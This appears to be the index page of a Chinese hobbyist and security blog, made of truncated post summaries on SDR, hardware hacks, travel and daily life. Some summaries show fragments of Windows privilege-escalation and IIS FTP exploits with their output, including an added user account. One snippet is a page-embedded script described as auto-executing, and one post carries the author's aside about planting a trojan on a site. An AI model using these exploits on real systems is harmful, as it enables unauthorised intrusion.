2007年8月12日
摘要: srsLTE代碼主要分為三個(gè)模塊,即srsUE、srseNB、srsEPC,另外還包括一些底層的庫函數(shù):
srsUE:實(shí)現(xiàn)了物理層到IP層的LTE SDR平臺(tái);
srseNB:全協(xié)議棧的LTE eNodeB SDR平臺(tái);
srsEPC:輕量級(jí)的LTE核心網(wǎng)實(shí)現(xiàn)平臺(tái),包括HSS、MME以及S/P-GW;
lib:一套模塊化的通用庫,包括PHY、MAC、RLC、NAS、S1AP以及GW各層。
系統(tǒng):ubuntu 16.04,使用實(shí)體機(jī),USB3.0,千萬不要用虛擬機(jī),一些指令優(yōu)化,時(shí)序。。。需要非常精準(zhǔn),比如雙向驗(yàn)證鑒權(quán)的時(shí)候,差一點(diǎn)都不行。
軟件無線電:bladeRF x40,LimeSDR mini,USRP B200
寫卡:買白卡和寫卡器,不要問我,自己關(guān)鍵字搜吧,taobao不讓賣了
安裝順序:UHD,SoapySDR,SoapyUHD,LimeSuite,bladeRF,srsGUI,srsLTE
。。。
閱讀全文
摘要:
一定會(huì)有人用這個(gè)關(guān)鍵字搜到這里的,
原來沒打算寫,網(wǎng)上搜索時(shí)候發(fā)現(xiàn)很多人深受苦惱,還是寫一下吧。
背景就不解釋了,此方法為下下策,能用武力解決的就盡量少嗶嗶。
。。。
閱讀全文
摘要:
認(rèn)證很簡單,只需要在FF04的UUID中寫入20字節(jié)的值并校驗(yàn)通過,就可以對(duì)手環(huán)進(jìn)行讀寫指令控制。
其實(shí)有個(gè)更簡單的,只要給Immediate Alert這個(gè)屬性發(fā)送0x01或者0x02即可啟動(dòng)“女性娛樂模式”,不需要任何認(rèn)證:
(這個(gè)屬性本來是用來可穿戴設(shè)備的找回功能的)
...
閱讀全文
摘要:
(U) Sniffing Proprietary 2.4GHz Signals
使用HackRF或者RTL-SDR加變頻器,那是極好的,但是我最終需要把所有東西都打包到一個(gè)小空間里面。
。。。。。。
閱讀全文
摘要:
翻譯部分內(nèi)容,備忘加鞏固,好多不清楚或錯(cuò)誤的地方,望高手指正。
extending the work of Thorsten Schr?der and Max Moser
of the KeyKeriki v2.0 project.
NHBadge and a Keyboard。。。。。。
閱讀全文
摘要:
閱讀全文
摘要:
閱讀全文
摘要:
備忘和參考
閱讀全文
摘要:
國外官方是300美元左右,目前買不到,國內(nèi)有做的,賣2800人民幣,買不起。只能自己做了,好幾個(gè)芯片好貴啊,都上百了。
閱讀全文
摘要:
閱讀全文
摘要:
支持手機(jī)(感覺可以把手機(jī)設(shè)置成MODEM模式支持AT命令的應(yīng)該都可以)
- Samsung Galaxy S3 GT-I9300
- Samsung Galaxy Nexus GT-I9250 (has to be rooted!)
- Samsung Galaxy S2 GT-I9100
- Samsung Galaxy Note 2 GT-N7100
。。。。。。
閱讀全文
摘要:
之前看過好多大牛玩osmocomBB項(xiàng)目,改個(gè)手機(jī),連電腦,然后編譯一堆東西,到最后都是開個(gè)console,滿屏紅紅綠綠的文字滾動(dòng),看著很吊。
但都不說最終能干啥,滾屏完了就沒了,大牛都太低調(diào)了,最近有朋友也在搞這個(gè),了解了一下,以下描述都是我最近查閱的大量鳥文資料及少量中文資料之后的理解,如有誤望指出。
OsmocomBB是國外一個(gè)開源項(xiàng)目,是GSM協(xié)議棧(Protocols stack)的開源實(shí)現(xiàn),全稱是Open source mobile communication Baseband.目的是要實(shí)現(xiàn)手機(jī)端從物理層(layer1)到layer3的三層實(shí)現(xiàn)。
這里記錄一下過程,以便備忘和其它有需要的童鞋少走彎路。
........
閱讀全文
摘要:
前段時(shí)間拆我的三星I9250,把音量排線弄斷了,由于幾乎看不到觸點(diǎn),修修補(bǔ)補(bǔ)好幾個(gè)月了,時(shí)好時(shí)壞,有時(shí)候volume+或者volume-被粘滯住了,就無法開機(jī)了,重啟直接進(jìn)入recovery模式或者安全模式,但是之后無法響應(yīng)任何鍵進(jìn)入系統(tǒng),還是得想辦法徹底地修一下。。。。
閱讀全文
摘要:
這小子,始終菊花跟臉同時(shí)對(duì)著我,算你狠。。。
。。。 閱讀全文
摘要:
Raspberry Pi是一款基于Linux系統(tǒng)的個(gè)人電腦,配備一枚700MHz的處理器,256內(nèi)存,支持SD卡和Ethernet,擁有兩個(gè)USB接口,以及 HDMI和RCA輸出支持。
有消息稱,雖然Raspberry Pi看起來非常的迷你——只有一張信用卡大小,但是它能夠運(yùn)行像《雷神之錘三:競技場》這樣的游戲和進(jìn)行1080p視頻的播放。但是以這次接TFT屏試用結(jié)果看,我覺得至少SPI是純屬扯J8蛋,可能HDMI速度快點(diǎn),但是就以那編譯內(nèi)核的速度來看,并不樂觀。
... ...
閱讀全文
摘要:
統(tǒng)一曬一下最近的圖,時(shí)間先后順序亂的
。。。。。。
閱讀全文
摘要:
每次都重新推算一遍,年紀(jì)大了還是記錄一下吧( 硬件版的TV-B-Gone的壓縮編碼跳過此段往下看)
N900上有個(gè)TVB-Gone的程序,但是程序的紅外編碼往往都是對(duì)應(yīng)的國外的電視,好多國產(chǎn)電視都不支持,
有時(shí)候需要遙控空調(diào)或者投影之類的,只能自己錄入了,大概看了一下,編碼比較簡單(比硬件那個(gè)簡單多了,畢竟不需要考慮程序空間的問題)
(上次錄過一次,這次又重搞一遍,還是記錄一下,以備后用。)
。。。
閱讀全文
摘要:
托rock的福,跟風(fēng)敗了個(gè)Raspberry Pi,(破手機(jī)照的,還可以吧 ^_^),安裝配置如下:
閱讀全文
摘要:
最近要破解一個(gè)軟件的密碼,發(fā)現(xiàn)用的我是007加密的,沒錯(cuò),軟件就叫尼瑪我是007,總結(jié)下方法:
……
閱讀全文
摘要:
1、The installer needs to commit changes to partition tables, but cannot do so because partitions on the following mount points could not be unmounted: /cdrom
2、ubuntu installer crashed Missing filesystem.size
閱讀全文
摘要:
半夜三更發(fā)blog,沒人疼啊。
打算做個(gè)模擬USB鍵盤的東東,半夜睡不著,先搭個(gè)USB名片試試,效果還挺好的,可以整些惡作劇,多做幾個(gè)可以送人,哈哈。
找現(xiàn)有的零件在面包板上測試的,所以不要評(píng)價(jià)外觀:)
……
閱讀全文
摘要:
之前做了個(gè) 27MHz的無線鍵盤監(jiān)聽,廢了不少勁,一直想做個(gè)2.4GHz的,
國內(nèi)買元器件和做PCB板子太麻煩,少了不做,又貴,中發(fā)電子城又遠(yuǎn),懶得跑,每次跑一趟,總有忘了買的,
拖拖拉拉的一直到最近才終于折騰完。
Cortex-M3的資料很少,Jlink調(diào)試還不太會(huì)搞,不知道是不是那個(gè)山寨的Jlink問題。
……
閱讀全文
摘要:
手工畫的,打印的效果肯定會(huì)更好……
閱讀全文
摘要:
中發(fā)的賣家真黑啊,15一個(gè),我是懶得淘寶買,要了兩個(gè),JS肯定背地里竊喜。
用了一個(gè)半,接到一起,效果還不錯(cuò)。
嚴(yán)重感謝明月松溪的耐心指導(dǎo),
嚴(yán)禁評(píng)價(jià)線圈外觀
閱讀全文
摘要: 芯片買了二批,都是壞的,都開始懷疑我對(duì)AVR的理解,甚至重買了個(gè)編程器,第三批芯片終于是好的。
結(jié)論是國內(nèi)好多芯片都是假的,悲催啊
……
閱讀全文
摘要:
一個(gè)國外的開源項(xiàng)目,通過截獲無線鍵盤發(fā)出的信號(hào),來監(jiān)聽鍵盤按鍵操作,第一個(gè)版本支持監(jiān)聽27MHz的無線鍵盤,第二個(gè)版本支持2.4G的無線鍵盤監(jiān)聽及注入功能,爽。
以前玩過C51單片機(jī),加上本身自學(xué)能力和手工焊接功底不錯(cuò),磕磕絆絆幾個(gè)月下來,終于初步完成了這個(gè)小玩意。
這次的芯片是ATMEL的MEGA64A,比之前C51系列的又強(qiáng)大、復(fù)雜了不少,制作過程中遇到非常多的問題,在這里鄙視一下(強(qiáng)烈地)國內(nèi)的知識(shí)共享精神
…………
閱讀全文
摘要:
Neopwn:
http://www.neopwn.com/
BackTrack Mobile版,再解釋一下,相當(dāng)于一個(gè)黑客工具集的手機(jī)版,裝完才發(fā)現(xiàn),其實(shí)主要用到的就wl1251,一個(gè)支持注入的網(wǎng)卡驅(qū)動(dòng),其它的很多功能都是空的,或者不好用,穩(wěn)定性不好,建議
……
閱讀全文
摘要:
......
轉(zhuǎn)眼過去多年時(shí)間多少離合悲歡
曾經(jīng)志在四方少年羨慕南飛的燕
各自奔前程的身影匆匆漸行漸遠(yuǎn)
未來在哪里平凡啊誰給我答案
那時(shí)陪伴我的人啊你們?nèi)缃裨诤畏? 我曾經(jīng)愛過的人啊現(xiàn)在是什么模樣
......
閱讀全文
摘要:
用相機(jī)和手機(jī)拍的,幾張白天拍的,幾張晚上拍的,開始分辨率不對(duì),調(diào)了下好多了,照片效果一般,實(shí)際效果比圖片好很多。
……
閱讀全文
摘要:
有時(shí)候下載115網(wǎng)盤的時(shí)候會(huì)提示“網(wǎng)絡(luò)繁忙時(shí)段,非登陸用戶其它下載地址暫時(shí)關(guān)閉。推薦您使用優(yōu)蛋下載,沒有優(yōu)蛋?立即下載 ”
其實(shí)稍微修改下就可以解決。
……
閱讀全文
摘要:
重裝了N遍驅(qū)動(dòng),N遍Kmplayer,包括不同版本的,完美解碼等,調(diào)試了無數(shù)回解碼器,渲染器,分離器什么的,還是沒有解決
最終發(fā)現(xiàn)是......
閱讀全文
摘要:
主要工具:烙鐵、鉗子、鉛筆刀(廢了至少6把)、AB膠(至少2對(duì))、砂紙、微型螺絲刀
主要材料:鉛筆×112支(六邊形最便宜那種)、棉簽棍若干、烤肉簽×1根、太陽能板、光控電路(廢了一個(gè))
附屬工具:酌情購買創(chuàng)口帖(以本人神乎其技的刀hua也用了兩三個(gè),殘念)
用時(shí):沒有好工具,而且空余時(shí)間構(gòu)思加制作,花了4個(gè)月多點(diǎn),之后零零散散做了些加工。
另:中間順便去了趟喬家大院 & 平遙古城找找感覺
工具條件比較簡陋,削斜面,切斷之類都是用的鉛筆刀,食指一側(cè)都長繭了。
..........
閱讀全文
摘要:
硬件需求:MC5725、小耳朵(天線)、EVDO資費(fèi)卡、AN/AAA碼、IMSI碼
軟件需求:T60BIOS2.22mod-1802 1804.iso、MC5725驅(qū)動(dòng)、CDMA_Workshop_v2.7.rar、EVDO.prl、QPST_v2.7.rar、EVDO_Watcher.exe
WCDMA太貴,不考慮,移動(dòng)的還早,現(xiàn)在比較流行的就是電信的EVDO,所以選定MC5725模塊,而且還能GPS,由于國外都沒有中國的機(jī)卡分離之說,所以需要把UIM卡的信息刷到模塊上面,這個(gè)信息就是AN/AAA碼和IMSI碼,需要電信的內(nèi)部人員提供,網(wǎng)上有些賣家能提供,不過現(xiàn)在好像越來越嚴(yán)了,估計(jì)以后很難拿到這些了。
如果需要發(fā)短信等普通手機(jī)功能,需要刷ESN碼,還有鑒權(quán)什么的需要刷AKey,如果只是上3G,只要AN/AAA碼和IMSI碼即可。
以上是這幾天翻閱海量帖子之后就我的理解,如有誤人子弟的地方請指正。
拆機(jī),安裝硬件(之前換過不下5次液晶屏的燈管,此等級(jí)的拆機(jī)裝機(jī)不費(fèi)吹灰之力)
... 閱讀全文
摘要:
綁定4444端口,Windows 2000 CN + SP4 測試通過,需要能建目錄的用戶,偏移地址若不通用,請自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
..................
閱讀全文
摘要:
TRS 是英文Text Retrieval System(文本檢索系統(tǒng))的縮寫,據(jù)說是全文檢索、搜索引擎、內(nèi)容管理及知識(shí)管理核心技術(shù)和產(chǎn)品的統(tǒng)一,入選2008年度國家規(guī)劃布局內(nèi)重點(diǎn)軟件企業(yè),做某些滲透經(jīng)常會(huì)碰到。
......
閱讀全文
摘要:
鳥文沒太看明白,摸索了一下,$_FILE數(shù)組元素解析的問題。
搭個(gè)php的環(huán)境,目錄在C:\www下,根目錄下有個(gè)upload.php代碼如下
......
閱讀全文
摘要:
更新頻度視出差頻度而定
上海虹橋機(jī)場
京滬空中快線A8登機(jī)口
cheerway snack bar A8/.............
閱讀全文
摘要:
這才是牛逼黑客,控制整棟大廈電力系統(tǒng),大廈燈光來做背景,改編成游戲!坦克大戰(zhàn)~~
.............
閱讀全文
摘要:
測試成功,點(diǎn)打印后,會(huì)彈出計(jì)算器
.........
閱讀全文
摘要:
26個(gè)字母,26個(gè)鋼琴鍵(鍵盤請?jiān)陉P(guān)閉漢字輸入法 然后點(diǎn)下上面的FLASH以獲得焦點(diǎn),才可正常使用),可以用a-z來彈,也可以用鼠標(biāo)
下面的音樂,彈出來就知道是什么了
.........
閱讀全文
摘要:
反正很老的機(jī)子了,刷壞了大不了買個(gè)新的
增加了如下功能:
1. 去網(wǎng)標(biāo),那個(gè)CMCC
2. 拍照可靜音,上次上課拍老師的投影,安靜的課堂上,咔嚓咔嚓很尷尬
3. 更新聲音和攝像的驅(qū)動(dòng)
4. 增加歌詞秀功能(這個(gè)是我迫切需要的功能)
5. 增加來電秀功能(來電或者去電,顯示對(duì)方的物理地址)
6. 字體變小,看著舒服一點(diǎn)
7. 比較酷的主題
8. 改walkman界面
9. 修改休眠模式顯示時(shí)間的字體
10. 長按側(cè)面的+按鈕,開啟或者關(guān)閉照明燈
11. 還有GPS功能,不實(shí)用,只顯示兩個(gè)十六進(jìn)制字符串,冒號(hào)分割,不知道什么意思,難道是經(jīng)度緯度?
12. 應(yīng)該還有,忘了
下面看圖
....................
閱讀全文
摘要:
%tmp:~2,1%
稍微看了下,原來這個(gè)字符串是這個(gè)意思:%tmp:~2,1% = mid(%tmp%,2,1) = \
......
閱讀全文
摘要:
某些地方畫得有出入,被人一通鄙視
歡總一語道破:觀察太少了
...........
閱讀全文
摘要:
我的有啥補(bǔ)丁打啥補(bǔ)丁的Win2k3 CN SP1測試成功
d:\Churrasco.exe "net user 009 /add"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......
閱讀全文
摘要:
左腿的陰影還行,云不會(huì)畫
閱讀全文
摘要:
“我的電腦黑屏了”
“我的電腦最近不知怎么變得很慢?“
“我上網(wǎng)老是自動(dòng)彈出頁面,怎么回事?”
“為什么殺毒軟件老是彈出來,每次都是同一個(gè)病毒?”
.....................
任何人,我一般都會(huì)幫忙,但是長時(shí)間停留在這個(gè)問題上,會(huì)瘋掉的,往往對(duì)方的描述不一定精確,光靠說,白白花了一天的時(shí)間也有可能搞不定一個(gè)小問題
也許有兩種情況我會(huì)耐心的給你分析,1:領(lǐng)導(dǎo),2:美女
我一般會(huì)說:“造成這種情況有149834種可能,重裝吧,裝完升級(jí)系統(tǒng),打補(bǔ)丁,裝殺毒,升級(jí)病毒庫,不要裝垃圾軟件,不要上色情網(wǎng)站。”
下面講講一般步驟,以下講的都是對(duì)付普通病毒,如果說驅(qū)動(dòng)級(jí),rootkit,bootkit什么的,要想讓我用一篇簡單的blog描述清楚恐怕不太現(xiàn)實(shí),讓你清理注入線程,SSDT之類的惡意程序就夠你受的了。
................
閱讀全文
摘要:
閱讀全文
摘要:
080913 北京-八達(dá)嶺高速-張家口-張北-寶昌鎮(zhèn)(太仆寺旗)-桑根達(dá)來鎮(zhèn)-烏日圖塔拉蘇木-錫林浩特-巴彥寶拉格蘇木-阿爾善寶拉格鎮(zhèn)-額和寶拉格蘇木-烏里亞斯太鎮(zhèn)(東烏珠穆沁旗)
080914 烏里亞斯太鎮(zhèn)(東烏珠穆沁旗)-寶拉格蘇木-巴彥霍布爾-額仁高畢蘇木-滿都胡寶拉格蘇木-寶格達(dá)山林場-五岔溝鎮(zhèn)-白狼鎮(zhèn)-阿爾山市
080914 阿爾山游玩一天
080915 阿爾山-白狼鎮(zhèn)-五岔溝鎮(zhèn)-好仁蘇木-科爾沁右翼前旗-突泉鎮(zhèn)-科爾沁右翼中旗-高力板鎮(zhèn)-舍伯吐鎮(zhèn)-通遼-赤峰市
080916 赤峰市-承德市-北京
PS了一下,主要調(diào)了下顏色對(duì)比度等,裁剪了下尺寸,因?yàn)橛械脑谲嚿吓牡模嬅嬷袝?huì)有反光鏡:),還有鏡頭上的水珠或者擋風(fēng)玻璃上的蟲子什么的,盡量PS掉了一些
..........
閱讀全文
摘要:
寫在文章開頭的話:抑郁癥嚴(yán)重者,切勿嘗試以下操作
不要被標(biāo)題誤導(dǎo)了,不是直接一步升完,其實(shí)還是從6.10升到7.04再升7.10再升8.04再升8.10,相當(dāng)漫長
(堅(jiān)持6.10很久了,由于之前beryl特效是自己配置安裝的,巨麻煩,一直舍不得升級(jí))
.....................
閱讀全文
摘要:
早上馬拉松在家門口經(jīng)過,下午去五棵松看女籃
十倍光學(xué)變焦,不是蓋的,不過別人已經(jīng)單反了
............
閱讀全文
摘要:
http://www.midomi.com/,首頁點(diǎn)上面的flash,Click and Sing or Hum
害我半夜翻箱倒柜找麥狼嚎,不過我唱的搜出來從來沒對(duì)過,我確定是這套系統(tǒng)的識(shí)別率有問題,沒錯(cuò),確定一定以及肯定。
.........
閱讀全文
摘要:
閱讀全文
摘要:
(之前發(fā)的"關(guān)于Fs2You怎么才能不被和諧"的文章被和諧掉了)
裝WordPress順便看到的
默認(rèn)plugins目錄有hello.php文件,不過好像很多插........
閱讀全文
摘要:
最近奧運(yùn)了,地鐵口變少了,開車單雙號(hào)了,馬路變窄了,物價(jià)上漲了,斷奶一個(gè)禮拜了,股票下跌了,失業(yè)率上升了,社會(huì)動(dòng)蕩了,公司加班了,獎(jiǎng)金不發(fā)了,關(guān)鍵是連燴面片都TMD開始放香菜了!
.........
閱讀全文
摘要:
lcx給的,網(wǎng)上的都是放啟動(dòng)項(xiàng),這個(gè)可以自動(dòng)執(zhí)行
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
.........
閱讀全文
摘要:
多貓殺圖,務(wù)必小心
....
閱讀全文
摘要:
今天找首歌,用kugoo,幾百年不用,賬號(hào)還在,提示自動(dòng)升級(jí),升完有個(gè)歌詞的功能灰常不錯(cuò),不像以前的歌詞秀那種平均時(shí)間分配的顯示歌詞,而是類似卡拉OK的顯示歌詞方式,比較適合跑調(diào)王。不是非常精確,不過已經(jīng)不錯(cuò)了。
一直用foobar,目前似乎還沒有對(duì)應(yīng)的插件。
......
閱讀全文
摘要:
PS: 實(shí)在太經(jīng)典,不得不轉(zhuǎn)一下
獻(xiàn)給所有的MGSER和游戲愛好者:
不論是作為psp平臺(tái)上目前fami通評(píng)分最高的游戲(39分)來看,還是從完美承接了MGS3的劇情來看,合金裝備-掌上行動(dòng)都是一款不可多得的優(yōu)秀作品。在曠世神作合金裝備4即將發(fā)售之際,提前領(lǐng)略一下這個(gè)系列無與倫比的劇情魅力,也是我們獻(xiàn)給每一個(gè)熱愛該系列的玩家們小小禮物。
..............
閱讀全文
摘要: 未測試,覺得比較雞肋,能中的人實(shí)在太少了
閱讀全文
摘要:
昨晚在吃飯的地方看了將近3小時(shí)電視(幾乎不看電視,家里沒電視),震憾,感人
太多太多太多感人的事跡,看著一幕幕畫面,真有自己過去搬石頭,幫忙出力的沖動(dòng),人家72小時(shí)不休息,大不了我48小時(shí)應(yīng)該沒問題,或者給人送個(gè)水什么的,能做什么就做什么。
給朋友打了個(gè)電話.......
閱讀全文
摘要:
NESP第一個(gè)版本成功后,我就開始著手更加袖珍版本的改造,讓我的NESP更容易攜帶。對(duì)于V3版本,我首先需要的是一塊能夠順利運(yùn)行NES游戲的主版NOAC,對(duì)比之前的版本,它的耗電量會(huì)更小。當(dāng)然我不會(huì)保證所有NES游戲都能100%兼容,估計(jì)會(huì)有小部分NES游戲不能運(yùn)行吧。
.......
閱讀全文
摘要:
經(jīng)過1個(gè)多月的使用時(shí)間,第一版本的NESP的缺陷就開始體現(xiàn)出來了。內(nèi)部的一些保護(hù)油脂在我需要更換之前就失去作用了,還有其他的措施也沒有起到預(yù)計(jì)的作用,主板最終還是被我的手汗侵蝕了。要是這種情況繼續(xù)下去的話,按鍵部分的電路會(huì)徹底報(bào)銷的。
............
閱讀全文
摘要:
在一個(gè)黑暗的風(fēng)雨交加之夜,一名瘋狂的技師正操控著一臺(tái)巨大的裝置。他的手中拿著長長的木條,并等待適當(dāng)?shù)臅r(shí)機(jī)進(jìn)行加工,工作間因?yàn)橥饷婵衽拈W電而充滿白色的光芒。閃電再三擊中建筑物,在被電弧纏繞的房間中,瘋狂技師露出了魔鬼般的笑容。實(shí)驗(yàn)終于完結(jié),把所有裝置移除后,展現(xiàn)在我們面前的是:一個(gè)屏幕閃動(dòng)著藍(lán)光的盒子。
...............
閱讀全文
摘要:
Windows的C++沒有pthread_t類型,linux中有個(gè)pthread.h,很多站的VC代碼,都不知道從哪包含來的,shit
網(wǎng)上看到有一個(gè)叫 POSIX Threads for Win32 的開源項(xiàng)目給出了一個(gè)功能比較完善的Windows下pthreads API的實(shí)現(xiàn)。
閱讀全文
摘要:
本文的內(nèi)容是 Win32 API(特別是進(jìn)程、線程和共享內(nèi)存服務(wù))到 POWER 上 Linux 的映射。本文可以幫助您確定哪種映射服務(wù)最適合您的需要。作者向您詳細(xì)介紹了他在移植 Win32 C/C++ 應(yīng)用程序時(shí)遇到的 API 映射。
閱讀全文
摘要:
剛?cè)ルx我住的地方方圓二里地內(nèi)最好的飯館吃飯(叫音樂餐廳,這里所謂最好的是指:一個(gè)人吃飯價(jià)錢還能承受,味道可以,而且吃完還不會(huì)拉肚子),晚飯吃得早了點(diǎn),因?yàn)橥砩系幕疖嚕锩嬉粋€(gè)人都沒有,除了服務(wù)員。坐下一四人小桌,服務(wù)員過來撤走三套餐具,留下一套離我最遠(yuǎn)的,在我對(duì)角的餐具,點(diǎn)了兩個(gè)菜一個(gè)炒飯,
........
閱讀全文
摘要: Win2k CN SP2 ,Win2k3 CN SP1下測試通過,其它未測試(不裝XP那種垃圾)
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo 閱讀全文
摘要:
RefControl 0.8.10
要是上次找到這個(gè)插件就好了,省得我一遍一遍地用nc修改referer提交
很多防盜鏈和防本地提交是依靠用戶瀏覽器自動(dòng)提交.......
閱讀全文
摘要: 以下方法修改完后,再刷新本頁就能看到上面圖片
Firefox:輸入about:config進(jìn)入配置頁面,修改network.http.sendRefererHeader的值為1即可(默認(rèn)是2),
.....
閱讀全文
摘要:
milw0rm上的,生成器
lcx給的,稍微改了改代碼,據(jù)說好用
未測試,最近忙到自殺的時(shí)間都沒有
唉,可惜有馬時(shí)候沒洞,有洞時(shí)候沒馬,要不就找個(gè)站掛上了。
http://www.tkk7.com/Files/baicker/Real........
閱讀全文
摘要: http://www.milw0rm.com/sploits/2008-zha0_ms08_014.rar
閱讀全文
摘要:
貌似花了兩小時(shí)
閱讀全文
摘要: 開發(fā)人員兢兢業(yè)業(yè)搞研發(fā)、開源,商業(yè)公司卻拿去申請專利
或許只是看了下面三行,您就忍不住想吐,那么麻煩堅(jiān)持一下,如果可以的話頂一下日志我會(huì)感到萬份榮幸
金山
刪除FAT卷中文件的方法, 申請?zhí)枺?00610122249.5
徹底粉碎FAT卷中文件數(shù)據(jù)的方法, 申請?zhí)枺?00610122247.6
徹底粉碎NTFS卷中文件數(shù)據(jù)的方法, 申請?zhí)枺?00610122479.1
一種Windows平臺(tái)下對(duì)抗API掛接的方法 http://www.cpsfu.com/G06F/2007/CN1936834.shtml
.............
閱讀全文
摘要: 自從orale注入可以執(zhí)行系統(tǒng)命令后,覺得oracle安全性實(shí)在太爛了,容易獲得系統(tǒng)權(quán)限,又動(dòng)不動(dòng)就死翹翹
昨天給朋友做個(gè)滲透測試,稍微掃掃就死了
以前給客戶做滲透測試也經(jīng)常碰到過oracle死掉的問題
相比MSSQL,估計(jì)也就只有巨型數(shù)據(jù)查詢速度快的優(yōu)勢了
閱讀全文
摘要:
終于下完了眾人期待的大作,PSP只用來看碟好幾年了,今天終于拷個(gè)游戲玩玩
雖然還是拜托不了一個(gè)穿著性感的肌肉男,拿著怪異的兵器到處殺人(怪)的模式,不過畫面和游戲性都是不錯(cuò)的說,操作非常爽快(但是我肯定沒耐心玩完)
最近比較墮落,還有些公司的破事(好像談到公司的事都是破事),沒寫什么技術(shù)性的文章也沒看什么技術(shù)性的文章
閱讀全文
摘要:
很多攢機(jī)的朋友都知道這個(gè)規(guī)律
品牌機(jī)為了吸引顧客,主要配件的配置會(huì)讓你看著很高
為了降低成本,往往有某一個(gè)或者幾個(gè)配件很“缺德”,要么雜牌,要么很低的配置
朋友一臺(tái)式機(jī),老抱怨慢,重裝也不行,看分辯率高點(diǎn)的電影還頓,我問配置,答曰:CPU 2.50G 內(nèi)存248M(估計(jì)256M)
朋友機(jī)器聯(lián)想的
我就寫明牌子了,咋的
閱讀全文
摘要: javascript:window.setTimeout=null;showDirectDownload() 閱讀全文
摘要: 老家的臺(tái)式機(jī)壞了,好不容易修好了,也沒啥用,就當(dāng)“碟機(jī)”吧,重裝系統(tǒng),就裝了個(gè)winrar和kmplayer
kmplayer播放某些avi文件的時(shí)候,對(duì)白小到幾乎聽不到,偶爾出現(xiàn)的背景音樂大到嚇人,網(wǎng)上找了很多,準(zhǔn)備按照步驟做,發(fā)現(xiàn)就沒有提到的解碼方式,我下的是kmplayer帶所有解碼包的版本,估計(jì)是沒有注冊。
在命令行到kmplayer的codecs目錄,
執(zhí)行如下命令:
........
閱讀全文
摘要: 犁式(八字)第一次滑就會(huì)了,水平到了一定高度,就很難提升,哈哈,今天恨了下心,租了個(gè)教練學(xué)平行式的,順便糾正了一下以前犁式的BUG
以下備忘,以便下次滑(說不定一年后),省得又花太多時(shí)間復(fù)習(xí)以前的技術(shù)
犁式:內(nèi)八字(緩坡減速,剎車功效),重心在中間,左轉(zhuǎn)重心在右腳,右轉(zhuǎn)重心在左腳(慣性原理,總之重心在坡下那只腳,轉(zhuǎn)彎外側(cè),如果你不是往坡上滑的話),板基本上水平(不是和破面平),刮雪才能起到減速作用,靠板立起的角度控制滑雪速度。
平行式:先從犁式開始,盡量使內(nèi)側(cè)的腳不受力(重心只在一條腿),能提起來,練習(xí)多次并逐漸提前抬腳的時(shí)間,直到你可以完全用一條滑雪板轉(zhuǎn)彎,慢慢的收起來和另一只承重腳平行,如左拐,重心在右腳,左腳和右腳平行,要習(xí)慣雙腳一高一低的感覺,用腿部的屈伸調(diào)解并保持正確的滑行姿勢,轉(zhuǎn)彎時(shí)盡量將外側(cè)的膝蓋置于另一只的后側(cè),方便下一次轉(zhuǎn)換到直滑和轉(zhuǎn)彎。
滑行過程中,重心前傾,小腿面和鞋梆之間要明顯感覺到壓力,重心稍低,雙手前伸,保持平衡。挪板使之急停感覺應(yīng)該是腳跟用力往坡下踩,使板橫過來,高速下腿承受很大沖擊力,得慢慢學(xué)習(xí)。
原地滑行:外八字 閱讀全文
摘要: 總算是公德圓滿
今年票販子加價(jià)比票價(jià)還高,真是汗
有兩張安檢那里買的,可靠性沒得說
...............
閱讀全文
摘要: 要寫個(gè)修改本地安全策略的工具,本以為修改注冊表就行了,沒想到還挺復(fù)雜,改策略,對(duì)應(yīng)的注冊表項(xiàng)會(huì)變,倒過來,改對(duì)應(yīng)的注冊表項(xiàng),策略沒變,郁悶
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account] |--------------------------------修改次數(shù)
"F"=hex:02,00,01,00,00,00,00,00,e0,7c,9e,21,1a,12,c6,01,43,00,00,00,00,00,00,\ 00 ~ 22
00,00,80,d2,16,47,b9,ff,ff,00,80,2c,ab,6d,fe,ff,ff,00,00,00,00,00,00,00,80,\ 23 ~ 47
00,cc,1d,cf,fb,ff,ff,ff,00,cc,1d,cf,fb,ff,ff,ff,00,00,00,00,00,00,00,00,f1,\ 48 ~ 72
03,00,00,00,00,00,00,02,00,18,00,00, 閱讀全文
摘要: 任何網(wǎng)站,打開后(有圖片的),瀏覽器輸入
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
閱讀全文
摘要: 網(wǎng)上找了N多資料,說得我暈頭轉(zhuǎn)向的,都是TMD資深顧問級(jí)別的文章,最后簡單幾步也可以搞定,過程如下:
我的SDK本來就是裝好的,再裝個(gè)DDK,就是重裝系統(tǒng),只要DDK目錄還在,重新指定下即可,不用重裝DDK
DDK目錄為: f:\WINDDK\3790.1830
以下以HelloWorld為例
-----------------------------------------HelloWorld.h---------------------------------------------------
#ifndef __HELLOWORLD_H__
#define __HELLOWORLD_H__
#include
.................
閱讀全文
